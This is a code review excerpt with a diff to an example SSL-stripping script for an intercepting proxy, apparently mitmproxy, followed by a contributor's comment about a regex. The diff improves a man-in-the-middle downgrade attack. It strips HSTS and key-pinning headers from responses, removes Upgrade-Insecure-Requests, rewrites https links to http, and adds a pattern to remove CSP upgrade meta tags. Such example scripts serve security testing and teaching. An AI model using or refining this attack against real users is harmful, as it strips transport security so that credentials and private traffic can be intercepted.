examples/sslstrip.py

```diff
@@ -9,19 +9,26 @@ def request(flow):
     flow.request.headers.pop('If-Modified-Since', None)
     flow.request.headers.pop('Cache-Control', None)
 
+    # do not force https redirection
+    flow.request.headers.pop('Upgrade-Insecure-Requests', None)
+
     # proxy connections to SSL-enabled hosts
     if flow.request.pretty_host in secure_hosts:
         flow.request.scheme = 'https'
         flow.request.port = 443
 
 
 def response(flow):
-    flow.request.headers.pop('Strict-Transport-Security', None)
-    flow.request.headers.pop('Public-Key-Pins', None)
+    flow.response.headers.pop('Strict-Transport-Security', None)
+    flow.response.headers.pop('Public-Key-Pins', None)
 
     # strip links in response body
     flow.response.content = flow.response.content.replace('https://', 'http://')
 
+    # strip meta tag upgrade-insecure-requests in response body
+    csp_meta_tag_pattern = '<meta.*http-equiv=["\']Content-Security-Policy[\'"].*upgrade-insecure-requests.*?>'
```

Comment:
Hi Maximilian, thanks for your review. I made the changes, the fact is do you still want me to simplify the csp_meta_tag_pattern (csp_meta_tag_pattern = b'<meta.*upgrade-insecure-requests.*?>' should take the risk to match every meta tag with this string, even meta description tag.).

Thanks,